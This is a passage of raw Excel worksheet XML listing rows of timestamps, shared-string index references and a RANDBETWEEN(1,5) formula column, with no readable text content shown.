        <v>10250</v>
      </c>
      <c r="F11456">
        <f t="shared" ca="1" si="178"/>
        <v>3</v>
      </c>
    </row>
    <row r="11457" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11457" s="1">
        <v>43318.642743055556</v>
      </c>
      <c r="C11457" t="s">
        <v>10</v>
      </c>
      <c r="D11457" t="s">
        <v>1091</v>
      </c>
      <c r="E11457" t="s">
        <v>10251</v>
      </c>
      <c r="F11457">
        <f t="shared" ca="1" si="178"/>
        <v>1</v>
      </c>
    </row>
    <row r="11458" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A11458" s="1">
        <v>43318.641157407408</v>
      </c>
      <c r="C11458" t="s">
        <v>623</v>
      </c>
      <c r="E11458" s="2" t="s">
        <v>10252</v>
      </c>
      <c r="F11458">
        <f t="shared" ref="F11458:F11521" ca="1" si="179">RANDBETWEEN(1,5)</f>
        <v>5</v>
      </c>
    </row>
    <row r="11459" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A11459" s="1">
        <v>43318.634456018517</v>
      </c>
      <c r="C11459" t="s">
        <v>10</v>
      </c>
      <c r="D11459" t="s">
        <v>80</v>
      </c>
      <c r="E11459" s="2" t="s">
        <v>10253</v>
      </c>
      <c r="F11459">
        <f t="shared" ca="1" si="179"/>
        <v>4</v>
      </c>
    </row>
    <row r="11460" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11460" s="1">
        <v>43318.628750000003</v>
      </c>
      <c r="C11460" t="s">
        <v>10</v>
      </c>
      <c r="D11460" t="s">
        <v>6</v>
      </c>
      <c r="E11460" t="s">
        <v>10254</v>
      </c>
      <c r="F11460">
        <f t="shared" ca="1" si="179"/>
        <v>4</v>
      </c>
    </row>
    <row r="11461" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A11461" s="1">
        <v>43318.623472222222</v>
      </c>
      <c r="C11461" t="s">
        <v>10</v>
      </c>
      <c r="D11461" t="s">
        <v>6</v>
      </c>
      <c r="E11461" s="2" t="s">
        <v>10255</v>
      </c>
      <c r="F11461">
        <f t="shared" ca="1" si="179"/>
        <v>1</v>
      </c>
    </row>
    <row r="11462" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A11462" s="1">
        <v>43318.618067129632</v>
      </c>
      <c r="C11462" t="s">
        <v>10</v>
      </c>
      <c r="D11462" t="s">
        <v>36</v>
      </c>
      <c r="E11462" s="2" t="s">
        <v>10256</v>
      </c>
      <c r="F11462">
        <f t="shared" ca="1" si="179"/>
        <v>4</v>
      </c>
    </row>
    <row r="11463" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11463" s="1">
        <v>43318.613946759258</v>
      </c>
      <c r="C11463" t="s">
        <v>10</v>
      </c>
      <c r="D11463" t="s">
        <v>192</v>
      </c>
      <c r="E11463" t="s">
        <v>10257</v>
      </c>
      <c r="F11463">
        <f t="shared" ca="1" si="179"/>
        <v>2</v>
      </c>
    </row>
    <row r="11464" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11464" s="1">
        <v>43318.590324074074</v>
      </c>
      <c r="C11464" t="s">
        <v>10</v>
      </c>
      <c r="D11464" t="s">
        <v>89</v>
      </c>
      <c r="F11464">
        <f t="shared" ca="1" si="179"/>
        <v>5</v>
      </c>
    </row>
    <row r="11465" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11465" s="1">
        <v>43318.590173611112</v>
      </c>
      <c r="C11465" t="s">
        <v>1189</v>
      </c>
      <c r="D11465" t="s">
        <v>80</v>
      </c>
      <c r="E11465" t="s">
        <v>10258</v>
      </c>
      <c r="F11465">
        <f t="shared" ca="1" si="179"/>
        <v>4</v>
      </c>
    </row>
    <row r="11466" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A11466" s="1">
        <v>43318.580370370371</v>
      </c>
      <c r="C11466" t="s">
        <v>463</v>
      </c>
      <c r="D11466" t="s">
        <v>41</v>
      </c>
      <c r="E11466" s="2" t="s">
        <v>10259</v>
      </c>
      <c r="F11466">
        <f t="shared" ca="1" si="179"/>
        <v>4</v>
      </c>
    </row>
    <row r="11467" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11467" s="1">
        <v>43318.558657407404</v>
      </c>
      <c r="C11467" t="s">
        <v>10</v>
      </c>
      <c r="D11467" t="s">
        <v>80</v>
      </c>
      <c r="E11467" t="s">
        <v>10260</v>
      </c>
      <c r="F11467">
        <f t="shared" ca="1" si="179"/>
        <v>3</v>
      </c>
    </row>
    <row r="11468" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A11468" s="1">
        <v>43318.558437500003</v>
      </c>
      <c r="C11468" t="s">
        <v>48</v>
      </c>
      <c r="E11468" s="2" t="s">
        <v>10261</v>
      </c>
      <c r="F11468">
        <f t="shared" ca="1" si="179"/>
        <v>5</v>
      </c>
    </row>
    <row r="11469" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11469" s="1">
        <v>43318.557974537034</v>
      </c>
      <c r="C11469" t="s">
        <v>10</v>
      </c>
      <c r="D11469" t="s">
        <v>36</v>
      </c>
      <c r="E11469" t="s">
        <v>10262</v>
      </c>
      <c r="F11469">
        <f t="shared" ca="1" si="179"/>
        <v>4</v>
      </c>
    </row>
    <row r="11470" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A11470" s="1">
        <v>43318.556597222225</v>
      </c>
      <c r="C11470" t="s">
        <v>124</v>
      </c>
      <c r="E11470" s="2" t="s">
        <v>10263</v>
      </c>
      <c r="F11470">
        <f t="shared" ca="1" si="179"/>
        <v>4</v>
      </c>
    </row>
    <row r="11471" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A11471" s="1">
        <v>43318.547581018516</v>
      </c>
      <c r="C11471" t="s">
        <v>4429</v>
      </c>
      <c r="D11471" t="s">
        <v>14</v>
      </c>
      <c r="E11471" s="2" t="s">
        <v>10264</v>
      </c>
      <c r="F11471">
        <f t="shared" ca="1" si="179"/>
        <v>5</v>
      </c>
    </row>
    <row r="11472" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11472" s="1">
        <v>43318.542731481481</v>
      </c>
      <c r="C11472" t="s">
        <v>10</v>
      </c>
      <c r="D11472" t="s">
        <v>23</v>
      </c>
      <c r="E11472" t="s">
        <v>10265</v>
      </c>
      <c r="F11472">
        <f t="shared" ca="1" si="179"/>
        <v>4</v>
      </c>
    </row>
    <row r="11473" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11473" s="1">
        <v>43318.542592592596</v>
      </c>
      <c r="C11473" t="s">
        <v>10</v>
      </c>
      <c r="D11473" t="s">
        <v>112</v>
      </c>
      <c r="E11473" t="s">
        <v>10266</v>
      </c>
      <c r="F11473">
        <f t="shared" ca="1" si="179"/>
        <v>3</v>
      </c>
    </row>
    <row r="11474" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11474" s="1">
        <v>43318.538298611114</v>
      </c>
      <c r="C11474" t="s">
        <v>10</v>
      </c>
      <c r="D11474" t="s">
        <v>89</v>
      </c>
      <c r="E11474" t="s">
        <v>10267</v>
      </c>
      <c r="F11474">
        <f t="shared" ca="1" si="179"/>
        <v>2</v>
      </c>
    </row>
    <row r="11475" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11475" s="1">
        <v>43318.528483796297</v>
      </c>
      <c r="C11475" t="s">
        <v>10</v>
      </c>
      <c r="D11475" t="s">
        <v>178</v>
      </c>
      <c r="E11475" t="s">
        <v>10268</v>
      </c>
      <c r="F11475">
        <f t="shared" ca="1" si="179"/>
        <v>4</v>
      </c>
    </row>
    <row r="11476" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A11476" s="1">
        <v>43318.52207175926</v>
      </c>
      <c r="C11476" t="s">
        <v>71</v>
      </c>
      <c r="E11476" s="2" t="s">
        <v>10269</v>
      </c>
      <c r="F11476">
        <f t="shared" ca="1" si="179"/>
        <v>5</v>
      </c>
    </row>
    <row r="11477" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11477" s="1">
        <v>43318.508518518516</v>
      </c>
      <c r="C11477" t="s">
        <v>6728</v>
      </c>
      <c r="D11477" t="s">
        <v>993</v>
      </c>
      <c r="E11477" t="s">
        <v>9730</v>
      </c>
      <c r="F11477">
        <f t="shared" ca="1" si="179"/>
        <v>3</v>
      </c>
    </row>
    <row r="11478" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A11478" s="1">
        <v>43318.501932870371</v>
      </c>
      <c r="C11478" t="s">
        <v>479</v>
      </c>
      <c r="D11478" t="s">
        <v>114</v>
      </c>
      <c r="E11478" s="2" t="s">
        <v>10270</v>
      </c>
      <c r="F11478">
        <f t="shared" ca="1" si="179"/>
        <v>3</v>
      </c>
    </row>
    <row r="11479" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11479" s="1">
        <v>43318.493067129632</v>
      </c>
      <c r="C11479" t="s">
        <v>6728</v>
      </c>
      <c r="D11479" t="s">
        <v>2139</v>
      </c>
      <c r="E11479" t="s">
        <v>9730</v>
      </c>
      <c r="F11479">
        <f t="shared" ca="1" si="179"/>
        <v>4</v>
      </c>
    </row>
    <row r="11480" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11480" s="1">
        <v>43318.48641203704</v>
      </c>
      <c r="C11480" t="s">
        <v>10</v>
      </c>
      <c r="D11480" t="s">
        <v>46</v>
      </c>
      <c r="E11480" t="s">
        <v>10271</v>
      </c>
      <c r="F11480">
        <f t="shared" ca="1" si="179"/>
        <v>2</v>
      </c>
    </row>
    <row r="11481" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A11481" s="1">
        <v>43318.485115740739</v>
      </c>
      <c r="C11481" t="s">
        <v>10</v>
      </c>
      <c r="D11481" t="s">
        <v>56</v>
      </c>
      <c r="E11481" s="2" t="s">
        <v>10272</v>
      </c>
      <c r="F11481">
        <f t="shared" ca="1" si="179"/>
        <v>3</v>
      </c>
    </row>
    <row r="11482" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A11482" s="1">
        <v>43318.474756944444</v>
      </c>
      <c r="C11482" t="s">
        <v>3106</v>
      </c>
      <c r="D11482" t="s">
        <v>374</v>
      </c>
      <c r="E11482" s="2" t="s">
        <v>10273</v>
      </c>
      <c r="F11482">
        <f t="shared" ca="1" si="179"/>
        <v>4</v>
      </c>
    </row>
    <row r="11483" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11483" s="1">
        <v>43318.469282407408</v>
      </c>
      <c r="C11483" t="s">
        <v>10</v>
      </c>
      <c r="D11483" t="s">
        <v>251</v>
      </c>
      <c r="E11483" t="s">
        <v>10274</v>
      </c>
      <c r="F11483">
        <f t="shared" ca="1" si="179"/>
        <v>4</v>
      </c>
    </row>
    <row r="11484" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11484" s="1">
        <v>43318.452326388891</v>
      </c>
      <c r="C11484" t="s">
        <v>10</v>
      </c>
      <c r="D11484" t="s">
        <v>89</v>
      </c>
      <c r="E11484" t="s">
        <v>10275</v>
      </c>
      <c r="F11484">
        <f t="shared" ca="1" si="179"/>
        <v>4</v>
      </c>
    </row>
    <row r="11485" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11485" s="1">
        <v>43318.42869212963</v>
      </c>
      <c r="C11485" t="s">
        <v>10</v>
      </c>
      <c r="E11485" t="s">
        <v>10276</v>
      </c>
      <c r="F11485">
        <f t="shared" ca="1" si="179"/>
        <v>4</v>
      </c>
    </row>
    <row r="11486" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11486" s="1">
        <v>43318.426620370374</v>
      </c>
      <c r="C11486" t="s">
        <v>10</v>
      </c>
      <c r="D11486" t="s">
        <v>20</v>
      </c>
      <c r="E11486" t="s">
        <v>10277</v>
      </c>
      <c r="F11486">
        <f t="shared" ca="1" si="179"/>
        <v>2</v>
      </c>
    </row>
    <row r="11487" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A11487" s="1">
        <v>43318.42324074074</v>
      </c>
      <c r="C11487" t="s">
        <v>529</v>
      </c>
      <c r="D11487" t="s">
        <v>194</v>
      </c>
      <c r="E11487" s="2" t="s">
        <v>10278</v>
      </c>
      <c r="F11487">
        <f t="shared" ca="1" si="179"/>
        <v>4</v>
      </c>
    </row>
    <row r="11488" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11488" s="1">
        <v>43318.418946759259</v>
      </c>
      <c r="C11488" t="s">
        <v>10</v>
      </c>
      <c r="D11488" t="s">
        <v>271</v>
      </c>
      <c r="E11488" t="s">
        <v>10279</v>
      </c>
      <c r="F11488">
        <f t="shared" ca="1" si="179"/>
        <v>5</v>
      </c>
    </row>
    <row r="11489" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A11489" s="1">
        <v>43318.400671296295</v>
      </c>
      <c r="C11489" t="s">
        <v>23</v>
      </c>
      <c r="D11489" t="s">
        <v>1036</v>
      </c>
      <c r="E11489" s="2" t="s">
        <v>10280</v>
      </c>
      <c r="F11489">
        <f t="shared" ca="1" si="179"/>
        <v>1</v>
      </c>
    </row>
    <row r="11490" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11490" s="1">
        <v>43318.385844907411</v>
      </c>
      <c r="C11490" t="s">
        <v>10</v>
      </c>
      <c r="D11490" t="s">
        <v>36</v>
      </c>
      <c r="E11490" t="s">
        <v>10281</v>
      </c>
      <c r="F11490">
        <f t="shared" ca="1" si="179"/>
        <v>3</v>
      </c>
    </row>
    <row r="11491" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11491" s="1">
        <v>43318.382962962962</v>
      </c>
      <c r="C11491" t="s">
        <v>3106</v>
      </c>
      <c r="D11491" t="s">
        <v>33</v>
      </c>
      <c r="E11491" t="s">
        <v>10282</v>
      </c>
      <c r="F11491">
        <f t="shared" ca="1" si="179"/>
        <v>1</v>
      </c>
    </row>
    <row r="11492" spans="1:6" ht="255" x14ac:dyDescent="0.25">
      <c r="A11492" s="1">
        <v>43318.374224537038</v>
      </c>
      <c r="C11492" t="s">
        <v>103</v>
      </c>
      <c r="D11492" t="s">
        <v>46</v>
      </c>
      <c r="E11492" s="2" t="s">
        <v>10283</v>
      </c>
      <c r="F11492">
        <f t="shared" ca="1" si="179"/>
        <v>2</v>
      </c>
    </row>
    <row r="11493" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11493" s="1">
        <v>43318.368564814817</v>
      </c>
      <c r="C11493" t="s">
        <v>69</v>
      </c>
      <c r="E11493" t="s">
        <v>10284</v>
      </c>
      <c r="F11493">
        <f t="shared" ca="1" si="179"/>
        <v>4</v>
      </c>
    </row>
    <row r="11494" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11494" s="1">
        <v>43318.351967592593</v>
      </c>
      <c r="C11494" t="s">
        <v>2225</v>
      </c>
      <c r="E11494" t="s">
        <v>8811</v>
      </c>
      <c r="F11494">
        <f t="shared" ca="1" si="179"/>
        <v>5</v>
      </c>
    </row>
    <row r="11495" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11495" s="1">
        <v>43318.345995370371</v>
      </c>
      <c r="C11495" t="s">
        <v>48</v>
      </c>
      <c r="E11495" t="s">
        <v>10285</v>
      </c>
      <c r="F11495">
        <f t="shared" ca="1" si="179"/>
        <v>4</v>
      </c>
    </row>
    <row r="11496" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A11496" s="1">
        <v>43318.34574074074</v>
      </c>
      <c r="C11496" t="s">
        <v>10286</v>
      </c>
      <c r="D11496" t="s">
        <v>14</v>
      </c>
      <c r="E11496" s="2" t="s">
        <v>10287</v>
      </c>
      <c r="F11496">
        <f t="shared" ca="1" si="179"/>
        <v>2</v>
      </c>
    </row>
    <row r="11497" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11497" s="1">
        <v>43318.331296296295</v>
      </c>
      <c r="C11497" t="s">
        <v>10</v>
      </c>
      <c r="D11497" t="s">
        <v>163</v>
      </c>
      <c r="E11497" t="s">
        <v>10288</v>
      </c>
      <c r="F11497">
        <f t="shared" ca="1" si="179"/>
        <v>2</v>
      </c>
    </row>
    <row r="11498" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A11498" s="1">
        <v>43318.330138888887</v>
      </c>
      <c r="C11498" t="s">
        <v>154</v>
      </c>
      <c r="D11498" t="s">
        <v>1993</v>
      </c>
      <c r="E11498" s="2" t="s">
        <v>10289</v>
      </c>
      <c r="F11498">
        <f t="shared" ca="1" si="179"/>
        <v>4</v>
      </c>
    </row>
    <row r="11499" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A11499" s="1">
        <v>43318.325069444443</v>
      </c>
      <c r="C11499" t="s">
        <v>993</v>
      </c>
      <c r="D11499" t="s">
        <v>71</v>
      </c>
      <c r="E11499" s="2" t="s">
        <v>10290</v>
      </c>
      <c r="F11499">
        <f t="shared" ca="1" si="179"/>
        <v>5</v>
      </c>
    </row>
    <row r="11500" spans="1:6" ht="360" x14ac:dyDescent="0.25">
      <c r="A11500" s="1">
        <v>43318.314166666663</v>
      </c>
      <c r="C11500" t="s">
        <v>454</v>
      </c>
      <c r="D11500" t="s">
        <v>480</v>
      </c>
      <c r="E11500" s="2" t="s">
        <v>10291</v>
      </c>
      <c r="F11500">
        <f t="shared" ca="1" si="179"/>
        <v>1</v>
      </c>
    </row>
    <row r="11501" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A11501" s="1">
        <v>43318.303182870368</v>
      </c>
      <c r="C11501" t="s">
        <v>29</v>
      </c>
      <c r="D11501" t="s">
        <v>1993</v>
      </c>
      <c r="E11501" s="2" t="s">
        <v>10292</v>
      </c>
      <c r="F11501">
        <f t="shared" ca="1" si="179"/>
        <v>2</v>
      </c>
    </row>
    <row r="11502" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11502" s="1">
        <v>43318.288865740738</v>
      </c>
      <c r="C11502" t="s">
        <v>10</v>
      </c>
      <c r="D11502" t="s">
        <v>17</v>
      </c>
      <c r="E11502" t="s">
        <v>10293</v>
      </c>
      <c r="F11502">
        <f t="shared" ca="1" si="179"/>
        <v>3</v>
      </c>
    </row>
    <row r="11503" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A11503" s="1">
        <v>43318.287303240744</v>
      </c>
      <c r="C11503" t="s">
        <v>103</v>
      </c>
      <c r="D11503" t="s">
        <v>23</v>
      </c>
      <c r="E11503" s="2" t="s">
        <v>10294</v>
      </c>
      <c r="F11503">
        <f t="shared" ca="1" si="179"/>
        <v>2</v>
      </c>
    </row>
    <row r="11504" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A11504" s="1">
        <v>43318.282962962963</v>
      </c>
      <c r="C11504" t="s">
        <v>10295</v>
      </c>
      <c r="D11504" t="s">
        <v>222</v>
      </c>
      <c r="E11504" s="2" t="s">
        <v>10296</v>
      </c>
      <c r="F11504">
        <f t="shared" ca="1" si="179"/>
        <v>5</v>
      </c>
    </row>
    <row r="11505" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A11505" s="1">
        <v>43318.282881944448</v>
      </c>
      <c r="C11505" t="s">
        <v>178</v>
      </c>
      <c r="D11505" t="s">
        <v>817</v>
      </c>
      <c r="E11505" s="2" t="s">
        <v>10297</v>
      </c>
      <c r="F11505">
        <f t="shared" ca="1" si="179"/>
        <v>3</v>
      </c>
    </row>
    <row r="11506" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A11506" s="1">
        <v>43318.268993055557</v>
      </c>
      <c r="C11506" t="s">
        <v>124</v>
      </c>
      <c r="E11506" s="2" t="s">
        <v>10298</v>
      </c>
      <c r="F11506">
        <f t="shared" ca="1" si="179"/>
        <v>5</v>
      </c>
    </row>
    <row r="11507" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A11507" s="1">
        <v>43318.266342592593</v>
      </c>
      <c r="C11507" t="s">
        <v>71</v>
      </c>
      <c r="E11507" s="2" t="s">
        <v>10299</v>
      </c>
      <c r="F11507">
        <f t="shared" ca="1" si="179"/>
        <v>4</v>
      </c>
    </row>
    <row r="11508" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A11508" s="1">
        <v>43318.264756944445</v>
      </c>
      <c r="C11508" t="s">
        <v>103</v>
      </c>
      <c r="D11508" t="s">
        <v>2139</v>
      </c>
      <c r="E11508" s="2" t="s">
        <v>10300</v>
      </c>
      <c r="F11508">
        <f t="shared" ca="1" si="179"/>
        <v>1</v>
      </c>
    </row>
    <row r="11509" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A11509" s="1">
        <v>43318.262569444443</v>
      </c>
      <c r="C11509" t="s">
        <v>2155</v>
      </c>
      <c r="D11509" t="s">
        <v>1993</v>
      </c>
      <c r="E11509" s="2" t="s">
        <v>10301</v>
      </c>
      <c r="F11509">
        <f t="shared" ca="1" si="179"/>
        <v>4</v>
      </c>
    </row>
    <row r="11510" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11510" s="1">
        <v>43318.22152777778</v>
      </c>
      <c r="C11510" t="s">
        <v>71</v>
      </c>
      <c r="E11510" t="s">
        <v>10302</v>
      </c>
      <c r="F11510">
        <f t="shared" ca="1" si="179"/>
        <v>5</v>
      </c>
    </row>
    <row r="11511" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11511" s="1">
        <v>43318.221388888887</v>
      </c>
      <c r="C11511" t="s">
        <v>48</v>
      </c>
      <c r="E11511" t="s">
        <v>10303</v>
      </c>
      <c r="F11511">
        <f t="shared" ca="1" si="179"/>
        <v>1</v>
      </c>
    </row>
    <row r="11512" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A11512" s="1">
        <v>43318.215590277781</v>
      </c>
      <c r="C11512" t="s">
        <v>319</v>
      </c>
      <c r="D11512" t="s">
        <v>10304</v>
      </c>
      <c r="E11512" s="2" t="s">
        <v>10305</v>
      </c>
      <c r="F11512">
        <f t="shared" ca="1" si="179"/>
        <v>2</v>
      </c>
    </row>
    <row r="11513" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A11513" s="1">
        <v>43318.207002314812</v>
      </c>
      <c r="C11513" t="s">
        <v>156</v>
      </c>
      <c r="D11513" t="s">
        <v>92</v>
      </c>
      <c r="E11513" s="2" t="s">
        <v>10306</v>
      </c>
      <c r="F11513">
        <f t="shared" ca="1" si="179"/>
        <v>1</v>
      </c>
    </row>
    <row r="11514" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A11514" s="1">
        <v>43318.200555555559</v>
      </c>
      <c r="C11514" t="s">
        <v>124</v>
      </c>
      <c r="E11514" s="2" t="s">
        <v>10307</v>
      </c>
      <c r="F11514">
        <f t="shared" ca="1" si="179"/>
        <v>4</v>
      </c>
    </row>
    <row r="11515" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A11515" s="1">
        <v>43318.188715277778</v>
      </c>
      <c r="C11515" t="s">
        <v>71</v>
      </c>
      <c r="E11515" s="2" t="s">
        <v>10308</v>
      </c>
      <c r="F11515">
        <f t="shared" ca="1" si="179"/>
        <v>4</v>
      </c>
    </row>
    <row r="11516" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A11516" s="1">
        <v>43318.184212962966</v>
      </c>
      <c r="C11516" t="s">
        <v>29</v>
      </c>
      <c r="D11516" t="s">
        <v>82</v>
      </c>
      <c r="E11516" s="2" t="s">
        <v>10309</v>
      </c>
      <c r="F11516">
        <f t="shared" ca="1" si="179"/>
        <v>2</v>
      </c>
    </row>
    <row r="11517" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A11517" s="1">
        <v>43318.180115740739</v>
      </c>
      <c r="C11517" t="s">
        <v>229</v>
      </c>
      <c r="E11517" s="2" t="s">
        <v>10310</v>
      </c>
      <c r="F11517">
        <f t="shared" ca="1" si="179"/>
        <v>5</v>
      </c>
    </row>
    <row r="11518" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A11518" s="1">
        <v>43318.151469907411</v>
      </c>
      <c r="C11518" t="s">
        <v>319</v>
      </c>
      <c r="D11518" t="s">
        <v>320</v>
      </c>
      <c r="E11518" s="2" t="s">
        <v>10311</v>
      </c>
      <c r="F11518">
        <f t="shared" ca="1" si="179"/>
        <v>5</v>
      </c>
    </row>
    <row r="11519" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11519" s="1">
        <v>43318.111550925925</v>
      </c>
      <c r="C11519" t="s">
        <v>140</v>
      </c>
      <c r="D11519" t="s">
        <v>847</v>
      </c>
      <c r="E11519" t="s">
        <v>10312</v>
      </c>
      <c r="F11519">
        <f t="shared" ca="1" si="179"/>
        <v>3</v>
      </c>
    </row>
    <row r="11520" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A11520" s="1">
        <v>43318.110185185185</v>
      </c>
      <c r="C11520" t="s">
        <v>103</v>
      </c>
      <c r="D11520" t="s">
        <v>480</v>
      </c>
      <c r="E11520" s="2" t="s">
        <v>10313</v>
      </c>
      <c r="F11520">
        <f t="shared" ca="1" si="179"/>
        <v>4</v>
      </c>
    </row>
    <row r="11521" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11521" s="1">
        <v>43318.108553240738</v>
      </c>
      <c r="C11521" t="s">
        <v>140</v>
      </c>
      <c r="D11521" t="s">
        <v>141</v>
      </c>
      <c r="E11521" t="s">
        <v>10314</v>
      </c>
      <c r="F11521">
        <f t="shared" ca="1" si="179"/>
        <v>5</v>
      </c>
    </row>
    <row r="11522" spans="1:6" ht="285" x14ac:dyDescent="0.25">
      <c r="A11522" s="1">
        <v>43318.106909722221</v>
      </c>
      <c r="C11522" t="s">
        <v>29</v>
      </c>
      <c r="D11522" t="s">
        <v>817</v>
      </c>
      <c r="E11522" s="2" t="s">
        <v>10315</v>
      </c>
      <c r="F11522">
        <f t="shared" ref="F11522:F11585" ca="1" si="180">RANDBETWEEN(1,5)</f>
        <v>1</v>
      </c>
    </row>
    <row r="11523" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11523" s="1">
        <v>43318.088923611111</v>
      </c>
      <c r="C11523" t="s">
        <v>1189</v>
      </c>
      <c r="D11523" t="s">
        <v>112</v>
      </c>
      <c r="E11523" t="s">
        <v>10258</v>
      </c>
      <c r="F11523">
        <f t="shared" ca="1" si="180"/>
        <v>3</v>
      </c>
    </row>
    <row r="11524" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A11524" s="1">
        <v>43318.086805555555</v>
      </c>
      <c r="C11524" t="s">
        <v>41</v>
      </c>
      <c r="E11524" s="2" t="s">
        <v>10316</v>
      </c>
      <c r="F11524">
        <f t="shared" ca="1" si="180"/>
        <v>1</v>
      </c>
    </row>
    <row r="11525" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11525" s="1">
        <v>43318.030659722222</v>
      </c>
      <c r="C11525" t="s">
        <v>477</v>
      </c>
      <c r="F11525">
        <f t="shared" ca="1" si="180"/>
        <v>4</v>
      </c>
    </row>
    <row r="11526" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11526" s="1">
        <v>43318.01666666667</v>
      </c>
      <c r="C11526" t="s">
        <v>253</v>
      </c>
      <c r="E11526" t="s">
        <v>10317</v>
      </c>
      <c r="F11526">
        <f t="shared" ca="1" si="180"/>
        <v>5</v>
      </c>
    </row>
    <row r="11527" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A11527" s="1">
        <v>43317.973946759259</v>
      </c>
      <c r="C11527" t="s">
        <v>29</v>
      </c>
      <c r="D11527" t="s">
        <v>1160</v>
      </c>
      <c r="E11527" s="2" t="s">
        <v>10318</v>
      </c>
      <c r="F11527">
        <f t="shared" ca="1" si="180"/>
        <v>4</v>
      </c>
    </row>
    <row r="11528" spans="1:6" ht="285" x14ac:dyDescent="0.25">
      <c r="A11528" s="1">
        <v>43317.95449074074</v>
      </c>
      <c r="C11528" t="s">
        <v>29</v>
      </c>
      <c r="D11528" t="s">
        <v>80</v>
      </c>
      <c r="E11528" s="2" t="s">
        <v>10319</v>
      </c>
      <c r="F11528">
        <f t="shared" ca="1" si="180"/>
        <v>4</v>
      </c>
    </row>
    <row r="11529" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A11529" s="1">
        <v>43317.935682870368</v>
      </c>
      <c r="C11529" t="s">
        <v>10</v>
      </c>
      <c r="D11529" t="s">
        <v>721</v>
      </c>
      <c r="E11529" s="2" t="s">
        <v>10320</v>
      </c>
      <c r="F11529">
        <f t="shared" ca="1" si="180"/>
        <v>5</v>
      </c>
    </row>
    <row r="11530" spans="1:6" ht="285" x14ac:dyDescent="0.25">
      <c r="A11530" s="1">
        <v>43317.924756944441</v>
      </c>
      <c r="C11530" t="s">
        <v>10</v>
      </c>
      <c r="D11530" t="s">
        <v>163</v>
      </c>
      <c r="E11530" s="2" t="s">
        <v>10321</v>
      </c>
      <c r="F11530">
        <f t="shared" ca="1" si="180"/>
        <v>3</v>
      </c>
    </row>
    <row r="11531" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11531" s="1">
        <v>43317.873749999999</v>
      </c>
      <c r="C11531" t="s">
        <v>10</v>
      </c>
      <c r="D11531" t="s">
        <v>151</v>
      </c>
      <c r="E11531" t="s">
        <v>10322</v>
      </c>
      <c r="F11531">
        <f t="shared" ca="1" si="180"/>
        <v>4</v>
      </c>
    </row>
    <row r="11532" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11532" s="1">
        <v>43317.835370370369</v>
      </c>
      <c r="C11532" t="s">
        <v>1501</v>
      </c>
      <c r="D11532" t="s">
        <v>993</v>
      </c>
